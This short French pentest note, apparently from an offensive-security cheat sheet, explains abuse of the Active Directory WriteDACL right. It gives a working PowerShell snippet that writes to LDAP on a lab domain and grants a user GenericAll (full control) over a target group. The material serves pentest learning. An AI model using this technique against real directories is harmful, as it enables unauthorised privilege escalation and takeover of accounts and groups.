WriteDACL + WriteOwner

Avec le droit WriteDACL, il est possible d'attribuer soi-même des permissions à l'objet cible. Le plus simple est donc de s'attribuer le droit GenericAll sur cet objet.

[!Attention]
Le faire avec PowerView / Le module powershell ActiveDirectory ne semble pas fonctionner correctement, il faut le faire en écrivant directement sur le LDAP.

Attribuer le droit GenericAll à l'utilisateur user sur le groupe test

1
2
3
4
5
6
7
8
9
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"

$IdentityReference = (New-Object System.Security.Principal.NTAccount("user")).Translate([System.Security.Principal.SecurityIdentifier])

$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference,"GenericAll","Allow"

$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)

$ADSI.psbase.commitchanges()

Il est maintenant possible d'avoir un contrôle total du groupe cible.